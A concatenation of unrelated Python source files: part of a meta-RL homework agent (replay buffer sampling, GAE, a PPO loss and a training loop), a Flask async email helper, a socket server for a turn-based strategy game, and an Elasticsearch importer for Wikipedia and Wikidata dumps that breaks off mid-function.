add the entire input as observation to the replay buffer, along with a, r, d
samples will be drawn from the replay buffer to update the policy
arguments:
env: the env to sample trajectories from
animate_this_episode: if True then render
val: whether this is training or evaluation
"""
env.reset_task(is_evaluation=is_evaluation)
stats = []
#====================================================================================#
# ----------PROBLEM 1----------
#====================================================================================#
ep_steps = 0
steps = 0
num_samples = max(self.history, self.max_path_length + 1)
meta_obs = np.zeros((num_samples + self.history + 1, self.meta_ob_dim))
rewards = []
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
if ep_steps == 0:
ob = env.reset()
# first meta ob has only the observation
# set a, r, d to zero, construct first meta observation in meta_obs
# YOUR CODE HERE
ac = np.zeros((self.ac_dim))
r = np.zeros((self.reward_dim))
d = np.zeros((self.terminal_dim))
meta_obs[self.history + steps] = np.concatenate((ob, ac, r, d), axis=0)
#meta_obs[self.history + steps + 1] = np.concatenate((ob, ac, r, d), axis=0)
steps += 1
# index into the meta_obs array to get the window that ends with the current timestep
# please name the windowed observation `in_` for compatibilty with the code that adds to the replay buffer (lines 418, 420)
# YOUR CODE HERE
in_ = meta_obs[steps : steps + self.history]
hidden = np.zeros((1, self.gru_size), dtype=np.float32)
# get action from the policy
# YOUR CODE HERE
ac = self.sess.run(self.sy_sampled_ac, feed_dict={self.sy_ob_no: np.array([in_]), self.sy_hidden: hidden})[0] #self.sy_ob_no: [in_]
# step the environment
# YOUR CODE HERE
ob, rew, done, _ = env.step(ac)
ep_steps += 1
done = bool(done) or ep_steps == self.max_path_length
# construct the meta-observation and add it to meta_obs
# YOUR CODE HERE
meta_obs[self.history + steps] = np.concatenate((ob, ac, [rew], [int(done)]), axis=0)
#meta_obs[self.history + steps + 1] = np.concatenate((ob, ac, [rew], [int(done)]), axis=0)
rewards.append(rew)
steps += 1
# add sample to replay buffer
if is_evaluation:
self.val_replay_buffer.add_sample(in_, ac, rew, done, hidden, env._goal)
else:
self.replay_buffer.add_sample(in_, ac, rew, done, hidden, env._goal)
# start new episode
if done:
# compute stats over trajectory
s = dict()
s['rewards']= rewards[-ep_steps:]
s['ep_len'] = ep_steps
stats.append(s)
ep_steps = 0
if steps >= num_samples:
break
return steps, stats
def compute_advantage(self, ob_no, re_n, hidden, masks, tau=0.95):
"""
computes generalized advantage estimation (GAE).
arguments:
ob_no: (bsize, history, ob_dim)
rewards: (bsize,)
masks: (bsize,)
values: (bsize,)
gamma: scalar
tau: scalar
output:
advantages: (bsize,)
returns: (bsize,)
requires:
self.gamma
"""
bsize = len(re_n)
rewards = np.squeeze(re_n)
masks = np.squeeze(masks)
values = self.sess.run(self.critic_prediction, feed_dict={self.sy_ob_no: ob_no, self.sy_hidden: hidden})[:,None]
gamma = self.gamma
assert rewards.shape == masks.shape == (bsize,)
assert values.shape == (bsize, 1)
bsize = len(rewards)
returns = np.empty((bsize,))
deltas = np.empty((bsize,))
advantages = np.empty((bsize,))
prev_return = 0
prev_value = 0
prev_advantage = 0
for i in reversed(range(bsize)):
returns[i] = rewards[i] + gamma * prev_return * masks[i]
deltas[i] = rewards[i] + gamma * prev_value * masks[i] - values[i]
advantages[i] = deltas[i] + gamma * tau * prev_advantage * masks[i]
prev_return = returns[i]
prev_value = values[i]
prev_advantage = advantages[i]
advantages = (advantages - np.mean(advantages, axis=0)) / np.std(advantages, axis=0)
return advantages, returns
def estimate_return(self, ob_no, re_n, hidden, masks):
"""
estimates the returns over a set of trajectories.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, history, meta_obs_dim)
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
hidden: hidden state of recurrent policy
masks: terminals masks
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
adv_n, q_n = self.compute_advantage(ob_no, re_n, hidden, masks)
return q_n, adv_n
def update_parameters(self, ob_no, hidden, ac_na, fixed_log_probs, q_n, adv_n):
"""
update the parameters of the policy and the critic,
with PPO update
arguments:
ob_no: (minibsize, history, meta_obs_dim)
hidden: shape: (minibsize, self.gru_size)
ac_na: (minibsize)
fixed_log_probs: (minibsize)
adv_n: shape: (minibsize)
q_n: shape: (sum_of_path_lengths)
returns:
nothing
"""
self.update_critic(ob_no, hidden, q_n)
self.update_policy(ob_no, hidden, ac_na, fixed_log_probs, adv_n)
def update_critic(self, ob_no, hidden, q_n):
"""
given:
self.num_value_iters
self.l2_reg
arguments:
ob_no: (minibsize, history, meta_obs_dim)
hidden: (minibsize, self.gru_size)
q_n: (minibsize)
requires:
self.num_value_iters
"""
target_n = (q_n - np.mean(q_n))/(np.std(q_n)+1e-8)
for k in range(self.num_value_iters):
critic_loss, _ = self.sess.run(
[self.critic_loss, self.critic_update_op],
feed_dict={self.sy_target_n: target_n, self.sy_ob_no: ob_no, self.sy_hidden: hidden})
return critic_loss
def update_policy(self, ob_no, hidden, ac_na, fixed_log_probs, advantages):
'''
arguments:
fixed_log_probs: (minibsize)
advantages: (minibsize)
hidden: (minibsize, self.gru_size)
'''
policy_surr_loss, _ = self.sess.run(
[self.policy_surr_loss, self.policy_update_op],
feed_dict={self.sy_ob_no: ob_no, self.sy_hidden: hidden, self.sy_ac_na: ac_na, self.sy_fixed_lp_n: fixed_log_probs, self.sy_adv_n: advantages})
return policy_surr_loss
def ppo_loss(self, log_probs, fixed_log_probs, advantages, clip_epsilon=0.1, entropy_coeff=1e-4):
"""
given:
clip_epsilon
arguments:
advantages (mini_bsize,)
states (mini_bsize,)
actions (mini_bsize,)
fixed_log_probs (mini_bsize,)
intermediate results:
states, actions --> log_probs
log_probs, fixed_log_probs --> ratio
advantages, ratio --> surr1
ratio, clip_epsilon, advantages --> surr2
surr1, surr2 --> policy_surr_loss
"""
ratio = tf.exp(log_probs - fixed_log_probs)
surr1 = ratio * advantages
surr2 = tf.clip_by_value(ratio, clip_value_min=1.0-clip_epsilon, clip_value_max=1.0+clip_epsilon) * advantages
policy_surr_loss = -tf.reduce_mean(tf.minimum(surr1, surr2))
probs = tf.exp(log_probs)
entropy = tf.reduce_sum(-(log_probs * probs))
policy_surr_loss -= entropy_coeff * entropy
return policy_surr_loss
def train_PG(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
mini_batch_size,
max_path_length,
learning_rate,
num_ppo_updates,
num_value_iters,
animate,
logdir,
normalize_advantages,
nn_critic,
seed,
n_layers,
size,
gru_size,
history,
num_tasks,
l2reg,
recurrent,
granularity,
):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
envs = {'pm': PointEnv,
'pm-obs': ObservedPointEnv,
}
env = envs[env_name](granularity, num_tasks)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length
# Observation and action sizes
ob_dim = env.observation_space.shape[0] #+4
ac_dim = env.action_space.shape[0]
task_dim = len(env._goal) # rude, sorry
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'task_dim': task_dim,
'size': size,
'gru_size': gru_size,
'learning_rate': learning_rate,
'history': history,
'num_value_iters': num_value_iters,
'l2reg': l2reg,
'recurrent': recurrent,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_return_args = {
'gamma': gamma,
'nn_critic': nn_critic,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_return_args)
# build computation graph
agent.build_computation_graph()
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
#========================================================================================#
# Training Loop
#========================================================================================#
def unpack_sample(data):
'''
unpack a sample from the replay buffer
'''
ob = data["observations"]
ac = data["actions"]
re = data["rewards"]
hi = data["hiddens"]
ma = 1 - data["terminals"]
return ob, ac, re, hi, ma
# construct PPO replay buffer, perhaps rude to do outside the agent
ppo_buffer = PPOReplayBuffer(agent.replay_buffer)
total_timesteps = 0
for itr in range(n_iter):
# for PPO: flush the replay buffer!
ppo_buffer.flush()
# sample trajectories to fill agent's replay buffer
print("********** Iteration %i ************"%itr)
stats = []
for _ in range(num_tasks):
s, timesteps_this_batch = agent.sample_trajectories(itr, env, min_timesteps_per_batch)
total_timesteps += timesteps_this_batch
stats += s
# compute the log probs, advantages, and returns for all data in agent's buffer
# store in ppo buffer for use in multiple ppo updates
# TODO: should move inside the agent probably
data = agent.replay_buffer.all_batch()
ob_no, ac_na, re_n, hidden, masks = unpack_sample(data)
fixed_log_probs = agent.sess.run(agent.sy_lp_n,
feed_dict={agent.sy_ob_no: ob_no, agent.sy_hidden: hidden, agent.sy_ac_na: ac_na})
q_n, adv_n = agent.estimate_return(ob_no, re_n, hidden, masks)
ppo_buffer.add_samples(fixed_log_probs, adv_n, q_n)
# update with mini-batches sampled from ppo buffer
for _ in range(num_ppo_updates):
data = ppo_buffer.random_batch(mini_batch_size)
ob_no, ac_na, re_n, hidden, masks = unpack_sample(data)
fixed_log_probs = data["log_probs"]
adv_n = data["advantages"]
q_n = data["returns"]
log_probs = agent.sess.run(agent.sy_lp_n,
feed_dict={agent.sy_ob_no: ob_no, agent.sy_hidden: hidden, agent.sy_ac_na: ac_na})
agent.update_parameters(ob_no, hidden, ac_na, fixed_log_probs, q_n, adv_n)
# compute validation statistics
print('Validating...')
val_stats = []
for _ in range(num_tasks):
vs, timesteps_this_batch = agent.sample_trajectories(itr, env, min_timesteps_per_batch // 10, is_evaluation=True)
val_stats += vs
# save trajectories for viz
with open("output/{}-epoch{}.pkl".format(exp_name, itr), 'wb') as f:
pickle.dump(agent.val_replay_buffer.all_batch(), f, pickle.HIGHEST_PROTOCOL)
agent.val_replay_buffer.flush()
# Log TRAIN diagnostics
returns = [sum(s["rewards"]) for s in stats]
final_rewards = [s["rewards"][-1] for s in stats]
ep_lengths = [s['ep_len'] for s in stats]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("FinalReward", np.mean(final_rewards))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
# Log VAL diagnostics
val_returns = [sum(s["rewards"]) for s in val_stats]
val_final_rewards = [s["rewards"][-1] for s in val_stats]
logz.log_tabular("ValAverageReturn", np.mean(val_returns))
logz.log_tabular("ValFinalReward", np.mean(val_final_rewards))
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='exp')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=0.99)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-pb', type=int, default=10000)
parser.add_argument('--mini_batch_size', '-mpb', type=int, default=64)
parser.add_argument('--num_tasks', '-nt', type=int, default=1)
parser.add_argument('--ep_len', '-ep', type=int, default=20)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-4)
parser.add_argument('--num_value_iters', '-nvu', type=int, default=1)
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_critic', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=1)
parser.add_argument('--size', '-s', type=int, default=64)
parser.add_argument('--gru_size', '-rs', type=int, default=32)
parser.add_argument('--history', '-ho', type=int, default=1)
parser.add_argument('--l2reg', '-reg', action='store_true')
parser.add_argument('--recurrent', '-rec', action='store_true')
parser.add_argument('--granularity', '-g', type=float, default=10) # number of square subdivisions over one plane axis
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size // args.num_tasks,
mini_batch_size=args.mini_batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
num_ppo_updates=(args.batch_size // args.mini_batch_size) * 5,
num_value_iters=args.num_value_iters,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_critic=args.nn_critic,
seed=seed,
n_layers=args.n_layers,
size=args.size,
gru_size=args.gru_size,
history=args.history,
num_tasks=args.num_tasks,
l2reg=args.l2reg,
recurrent=args.recurrent,
granularity=args.granularity,
)
print("args granularity ", args.granularity)
# # Awkward hacky process runs, because Tensorflow does not like
# # repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(
"[{prefix}] {subject}".format(prefix=app.config["MAIL_SUBJECT_PREFIX"], subject=subject),
sender=app.config["MAIL_SENDER"],
recipients=[to],
)
msg.body = render_template(template + ".txt", **kwargs)
msg.html = render_template(template + ".html", **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
server.py
|
import socket
import threading
from random import randint
from map_generation.spread_players import spread_across_the_map
from server_utils.player import Player
FORMAT = 'utf-8'
HEADER = 200
def print_color(text):
print("\u001b[36m" + text + "\u001b[0m")
class Server:
def __init__(self, terrain_map):
"""
:param terrain_map: A 2D list of integer values representing tile types on the map.
"""
self.map_to_send = terrain_map
self.players = []
self.queue = []
self.connections = dict()
self.threads = []
self.colours = ['BUBBLE_GUM', 'CHERRY', 'PURPLE', 'CORAL']
self.civilizations = ["The Great Northern", "Kaediredameria", "Mixtec", "Kintsugi"]
self.current_player = 0 # index in self.players that indicates who is active
self.rank = 0 # for now
self.started = False
self.finish = False
self.sock = None
self.ip = None
self.port = None
self.create_socket()
def create_socket(self):
"""
Initializes the server's socket.
"""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.settimeout(1)
self.sock.bind(('', 0))
host = socket.gethostname()
self.ip = socket.gethostbyname(host)
self.port = self.sock.getsockname()[1]
def header_generator(self, str_response):
"""
Generates a proper header for a message.
:param str_response: a message for which the header will be generated
:return: the header containing the message length
"""
resp_len = str(len(str_response)).encode(FORMAT)
resp_len += b' ' * (HEADER - len(resp_len))
return resp_len
def parse_request(self, incoming_msg, conn):
"""
Used to generate a response/broadcast reacting to a clients message. A response is only sent to the original
caller, whereas a broadcast is sent to every client that's currently connected.
:param incoming_msg: the message that's being responded to
:param conn: the connection with the client whose call is being responded to
:return: a tuple of response (a list of messages that will be sent to the og caller) and broadcast (a list of
messages that will be sent to everybody)
"""
request = incoming_msg.split(":")
response = []
broadcast = []
if request[0] == "ADD_NEW_PLAYER":
if len(self.colours) != 0:
idx = randint(0, len(self.colours) - 1)
col = self.colours[idx]
self.colours.remove(col)
new_player = Player(request[1], col)
self.players.append(new_player)
self.connections[conn] = new_player
response.append(f"{request[1]}:YOU HAVE BEEN SUCCESSFULLY ADDED TO THE GAME".encode(FORMAT))
# broadcast = f"NEW PLAYER".encode(FORMAT)
elif request[0] == "CHOOSE_CIVILISATION":
if len(self.civilizations) != 0:
for player in self.players:
if player.player_name == request[1]:
# idx = self.civilizations.index(request[1])
self.civilizations.remove(request[2])
player.set_civilisation_type(request[2])
broadcast = f"NEW_PLAYER:{player.player_name}:{player.civilisation_type}:{player.player_colour}"
broadcast = [broadcast.encode(FORMAT)]
response.append(f"{request[1]} CHOSEN TYPE: {request[2]}".encode(FORMAT))
elif request[0] == "DISCONNECT":
broadcast = [incoming_msg.encode(FORMAT)]
player = self.connections[conn]
player.rank = self.rank
self.rank -= 1
ind = self.queue.index(player)
self.queue.pop(ind)
if ind == self.current_player:
ind = ind % len(self.queue)
next_player = self.queue[ind]
broadcast.extend(next_player.message_queue)
broadcast.append(f"TURN:{next_player.player_name}".encode(FORMAT))
next_player.message_queue.clear()
elif ind < self.current_player:
self.current_player = (self.current_player - 1) % len(self.queue)
self.connections.pop(conn)
elif request[0] == "DEFEAT":
broadcast = [incoming_msg.encode(FORMAT)]
ind = None
for i, player in enumerate(self.queue):
if player.player_name == request[1]:
player.rank = self.rank
self.rank -= 1
ind = i
break
if ind is not None:
self.queue.pop(ind)
if ind == self.current_player:
ind = ind % len(self.queue)
next_player = self.queue[ind]
broadcast.extend(next_player.message_queue)
broadcast.append(f"TURN:{next_player.player_name}".encode(FORMAT))
next_player.message_queue.clear()
elif ind < self.current_player:
self.current_player = (self.current_player - 1) % len(self.queue)
elif request[0] == "LIST_PLAYERS":
player_list = []
for player in self.players:
player_string = player.player_name
player_string += ':'
player_string += player.civilisation_type
player_string += ':'
player_string += player.player_colour
player_list.append(player_string)
response.append(str(player_list).encode(FORMAT))
elif request[0] == "LIST_CIVILIZATIONS":
civilizations_in_string = str(self.civilizations)
response.append(f"{civilizations_in_string}".encode(FORMAT))
elif request[0] == "SHOW_MAP":
map_in_string = str(self.map_to_send)
response.append(f"{map_in_string}".encode(FORMAT))
elif request[0] == "END_TURN":
response.append(incoming_msg.encode(FORMAT))
self.current_player += 1
self.current_player %= len(self.queue)
next_player = self.queue[self.current_player]
broadcast = [*next_player.message_queue, f"TURN:{next_player.player_name}".encode(FORMAT)]
next_player.message_queue.clear()
elif request[0] == "START_GAME":
self.started = True
self.queue = self.players.copy()
self.rank = len(self.players)
response.append(f"{request[1]}: YOU HAVE STARTED THE GAME".encode(FORMAT))
start_coords = spread_across_the_map(self.map_to_send, len(self.queue))
for i, (y, x) in enumerate(start_coords):
broadcast.append(f"ADD_UNIT:{self.queue[i].player_name}:{(x, y)}:Settler:1".encode(FORMAT))
broadcast.append(f"TURN:{self.queue[0].player_name}".encode(FORMAT))
elif request[0] == "EXIT_LOBBY":
broadcast = [f"FINISH:::".encode(FORMAT)]
elif request[0] == "QUIT_GAME":
wanted = next((player for player in self.players if player.player_name == request[1]), None)
self.players.remove(wanted)
idx = self.players.index(wanted)
self.connections[idx].close()
self.connections.pop(idx)
self.threads[idx].join()
self.threads.pop(idx)
elif request[0] == "END_GAME":
for player in self.players:
player.rank = player.rank - len(self.queue) + 1 if player.rank else 1
broadcast.append("GAME_ENDED".encode(FORMAT))
broadcast.extend(str(f"RANK:{player.player_name}:{player.rank}").encode(FORMAT) for player in self.players)
broadcast.append(incoming_msg.encode(FORMAT))
self.finish = True
elif request[0] == "ADD_UNIT" or request[0] == "MOVE_UNIT" or request[0] == "HEALTH":
broadcast = [incoming_msg.encode(FORMAT)]
elif request[0] == "ADD_CITY":
wanted = next((player for player in self.players if player.player_name == request[1]), None)
wanted.city_list.append(request[3])
broadcast = [incoming_msg.encode(FORMAT)]
elif request[0] == "MORE_AREA":
broadcast = [incoming_msg.encode(FORMAT)]
elif request[0] == "GIVE_CITY":
broadcast = [incoming_msg.encode(FORMAT)]
elif request[0].startswith("DIPLOMACY"):
wanted = next((player for player in self.players if player.player_name == request[3]), None)
if wanted is not None:
wanted.message_queue.append(incoming_msg.encode(FORMAT))
elif request[0] == "LIST_PLAYERS":
response_list = []
for player in self.players:
response_list.extend([player.player_name])
response_list_to_str = str(response_list)
response.append(response_list_to_str.encode(FORMAT))
else:
response.append(f"UNKNOWN OPTION".encode(FORMAT))
return response, broadcast
def connection_handler(self, conn, addr):
"""
Oversees client-server communication. Is being run in its separate thread for each client.
:param conn: socket object used to send and receive data to the client
:param addr: client's address
"""
connected = True
while connected and not self.finish:
try:
msg_len = conn.recv(HEADER).decode(FORMAT)
except socket.timeout:
continue
if msg_len:
msg_len = int(msg_len)
incoming_message = conn.recv(msg_len).decode(FORMAT)
print_color(f"RECEIVED NEW MESSAGE: {incoming_message} from {addr}")
if incoming_message[0] == 'DISCONNECT':
connected = False
response, broadcast = self.parse_request(incoming_message, conn)
if len(response) != 0:
response_length = self.header_generator(response[0])
conn.send(response_length)
conn.send(response[0])
while broadcast:
mes = broadcast.pop(0)
for c in self.connections:
length = self.header_generator(mes)
c.send(length)
c.send(mes)
def start_connection(self):
"""
Accepts a new client connection and creates a thread for handling it.
"""
try:
self.sock.listen()
print_color(f"IM HERE: {self.ip} {self.port}")
while not self.started and not self.finish:
try:
conn, addr = self.sock.accept()
except socket.timeout:
continue
self.connections[conn] = None
conn.settimeout(1)
print_color(f"NEW CONNECTION FROM {addr} ")
new_thread = threading.Thread(target=self.connection_handler, args=(conn, addr))
self.threads.append(new_thread)
new_thread.start()
print_color(f"N_O ACTIVE CONNECTIONS: {threading.activeCount() - 2}")
for thread in self.threads:
thread.join()
except KeyboardInterrupt:
for thread in self.threads:
thread.join()
print_color("SERVER PROCESS TERMINATED")
# for testing
if __name__ == "__main__":
server = Server([1, 2])
|
es.py
|
"""
Setup (once only)
$ python app/es.py
Docker network
$ sudo docker network create twint-wikilink
$ sudo docker network connect twint-wikilink <wikilink-app-container-id>
$ sudo docker network connect twint-wikilink <twint-es-container-id>
$ ping -c 2 twintdevcontainer_es_1 -p 9200
Elasticsdump
$ multielasticdump --direction=dump --match='^.*$' --fsCompress --input=http://es:9200 --output=esdump_2020****
$ multielasticdump --direction=load --match='^.*$' --fsCompress --output=http://es:9200 --input=esdump_2020****
"""
from __future__ import annotations
import asyncio
import base64
import bz2
import collections
from concurrent.futures import process
import datetime
import glob
import gzip
import html
import json
import os
import pickle
import re
import threading
import queue
from typing import Iterable, List, Tuple, Optional
import elasticsearch
import mwparserfromhell
from elasticsearch_dsl import connections, Document, Date, Keyword, Q, Search, Text, Range, Integer, Float
from qwikidata.entity import WikidataItem
from qwikidata.json_dump import WikidataJsonDump
# import wikitextparser as wtp
PAGE_ALIAS = "wiki-page"
PAGE_PATTERN = f"{PAGE_ALIAS}-*"
REDIRECT_ALIAS = "wiki-redirect"
REDIRECT_PATTERN = f"{REDIRECT_ALIAS}-*"
WKD_ALIAS = "wiki-data"
WKD_PATTERN = f"{WKD_ALIAS}-*"
# TICKER_ALIAS = "yahoo-ticker"
# TICKER_PATTERN = TICKER_ALIAS + '-*'
class WikiRedirect(Document):
title = Keyword(required=True) # as doc._id for quick search
redirect = Keyword() # redirect to wiki title
redirect_wkid = Keyword() # redirect to wiki id
dbpedia_id = Keyword()
class Index:
name = REDIRECT_ALIAS
settings = {
'number_of_shards': 1,
'number_of_replicas': 0
}
def save(self, **kwargs):
if 'id' not in self.meta:
self.meta.id = self.title
return super().save(**kwargs)
class WikiPage(Document):
wkid = Keyword(required=True) # wiki page id, use as doc._id
mentions = Keyword(multi=True, index=False) # json string
# fields from cirrussearch
template = Keyword(multi=True)
content_model = Keyword()
# opening_text
wiki = Keyword()
# auxiliary_text
language = Keyword()
title = Keyword()
text = Text(index=False) # escaped
# defaultsort
# timestamp
redirect = Text(index=False) # json string
wikibase_item = Keyword()
# version_type
# heading
source_text = Text(index=False)
# coordinates
# version
# external_link
# namespace_text
namespace = Integer()
# text_bytes
# incoming_links
category = Keyword(multi=True)
outgoing_link = Keyword(multi=True)
popularity_score = Float()
# create_timestamp
# ores_articletopics
class Index:
name = PAGE_ALIAS
settings = {
'number_of_shards': 1,
'number_of_replicas': 0, }
def save(self, **kwargs):
if 'id' not in self.meta:
self.meta.id = self.wkid
return super().save(**kwargs)
# @classmethod
# def match(cls, title: str, min_score: int = 10):
# s = cls.search()
# s = s.query("match", title=title)
# for hit in s.execute()[:1]:
# if hit.meta.score > min_score:
# return hit
# return None
class WikiData(Document):
en_title = Keyword(required=True) # en wiki title, use as doc._id
wkd_id = Keyword(required=True) # wiki data id
json = Text(index=False)
class Index:
name = WKD_ALIAS
settings = {
'number_of_shards': 1,
'number_of_replicas': 0, }
def save(self, **kwargs):
if 'id' not in self.meta:
self.meta.id = self.en_title
return super().save(**kwargs)
def search_wikipage(title: str, min_score: int = 10):
s = WikiRedirect.search()
s = s.query("match", title=title)
for hit in s.execute()[:1]:
if hit.meta.score > min_score:
return hit
return None
def get_wikipage(title: str) -> Optional[WikiPage]:
try:
redirect = WikiRedirect.get(id=title)
return WikiPage.get(id=redirect.redirect_wkid)
except elasticsearch.NotFoundError:
redirect = search_wikipage(title)
if redirect is None:
return
else:
return WikiPage.get(id=redirect.redirect_wkid)
def get_corresponded_wktitles(cat_title: str) -> List[str]:
"""給wiki category title,找到該category的主要page titles"""
excluded = set(["Help:Categories"])
excluded_sub = ("Category:", "Wikipedia:", "Template:", "CAT:")
page = get_wikipage(title=cat_title)
if page is None:
return []
# try:
titles = set(page.outgoing_link) - excluded
titles = filter(lambda e: not any(
f in e for f in excluded_sub), titles)
titles = [t.replace("_", " ") for t in titles]
return titles
# except:
# return []
# ---------------
# Utilities
# ---------------
class ThreadsafeIter:
"""https://gist.github.com/platdrag/e755f3947552804c42633a99ffd325d4"""
def __init__(self, it):
self.it = it
self.lock = threading.Lock()
def __iter__(self):
return self
def __next__(self):
with self.lock:
return self.it.__next__()
def threadsafe_generator(f):
def g(*a, **kw):
return ThreadsafeIter(f(*a, **kw))
return g
def _parse_mentions(text: str) -> List[str: str]:
"""
Retrun: List of tuples, eg [("wiki title", "mentioned text"), ...]
"""
# parsed = wtp.parse(text)
# mentions = [(k.title, k.text or k.title) for k in parsed.wikilinks]
wikicode = mwparserfromhell.parse(text)
links = wikicode.filter_wikilinks()
mentions = []
for k in links:
title = k.title.strip_code()
text = title if k.text is None else k.text.strip_code()
mentions.append((title, text))
return mentions
def import_from_cirrusdump(dump_path: str, n_threads: int, skip: int = 0, first_n: int = None) -> None:
def convert_title(title: str, namespace: int) -> str:
return f"Category:{title}" if namespace == 14 else title
def processor(ln1: str, ln2: str) -> None:
j1 = json.loads(ln1)
j2 = json.loads(ln2)
if j2["namespace"] not in (0, 14):
return
wkid = j1["index"]["_id"]
title = convert_title(j2["title"], j2["namespace"])
popularity_score = j2["popularity_score"] if "popularity_score" in j2 else None
wikibase_item = j2["wikibase_item"] if "wikibase_item" in j2 else None
for r in j2["redirect"]:
if r["namespace"] not in (0, 14):
return
doc = WikiRedirect(
title=convert_title(r["title"], r["namespace"]),
redirect=title,
redirect_wkid=wkid)
doc.save()
# allow self-redirect
doc = WikiRedirect(
title=title,
redirect=title,
redirect_wkid=wkid)
doc.save()
doc = WikiPage(
title=title,
wkid=wkid,
mentions=json.dumps(
_parse_mentions(j2["source_text"]),
ensure_ascii=False),
template=j2["template"],
content_model=j2["content_model"],
wiki=j2["wiki"],
language=j2["language"],
text=j2["text"],
redirect=json.dumps(j2["redirect"], ensure_ascii=False),
wikibase_item=wikibase_item,
# source_text=j2["source_text"],
namespace=j2["namespace"],
category=j2["category"],
outgoing_link=j2["outgoing_link"],
popularity_score=popularity_score,)
doc.save()
@threadsafe_generator
def readline():
with gzip.open(dump_path, 'r') as f:
for i, ln1 in enumerate(f):
if first_n is not None and i > first_n:
print(f"Early stop: {first_n}")
break
if i < skip:
continue
if i % 10000 == 0:
print(i)
ln2 = next(f)
yield ln1, ln2
readline = readline()
q = queue.Queue()
def worker():
while True:
try:
ln1, ln2 = q.get()
processor(ln1, ln2)
except Exception as e:
# print(ln2.decode())
print(e)
# break
# print(meta, doc)
try:
q.put(next(readline))
except StopIteration:
pass
finally:
q.task_done()
for _ in range(n_threads):
threading.Thread(target=worker, daemon=True).start()
for _ in range(n_threads * 3):
q.put(next(readline))
q.join()
print('All work completed')
def import_from_wkddump(dump_path: str, skip: int = 0, first_n: int = None) -> None:
for i, entity_dict in enumerate(WikidataJsonDump(dump_path)):
if first_n is not None and i > first_n:
print(f"Early stop at {first_n}")
break
if i < skip:
continue
if i % 10000 == 0:
print(i)
if entity_dict["type"] == "item":
e = WikidataItem(entity_dict)
doc = WikiData(
en_title=e.get_enwiki_title(),
wkd_id=e.entity_id,
json=json.dumps(e._entity_dict),)
doc.save()
def import_from_wikiextracted(path_to_wikiextracted_folder: str):
print("Wikiextracted to elastic start")
for p in glob.glob(f'{path_to_wikiextracted_folder}/**/*'):
print(p)
with open(p) as f:
for ln in f.readlines():
j = json.loads(ln)
charoffsets_mentions = pickle.loads(
base64.b64decode(j['internal_links'].encode('utf-8')))
mentions = [
(char_start, char_end, mention, wiki_page_name)
for ((char_start, char_end), (mention, wiki_page_name)) in charoffsets_mentions.items()
]
p = WikiPage(
title=html.unescape(j["title"]),
uid=j["id"],
url=j["url"],
text=j["text"],
mentions=json.dumps(mentions, ensure_ascii=False))
p.save()
print("Wikiextracted to elastic finished")
def wkredirects_to_elastic(path_to_dbpedia_folds: str):
require_files = (
"page_ids_en.ttl.bz2",
"redirects_lang=en.ttl.bz2",
)
def scan_ttl(path: str, proc_one: callable):
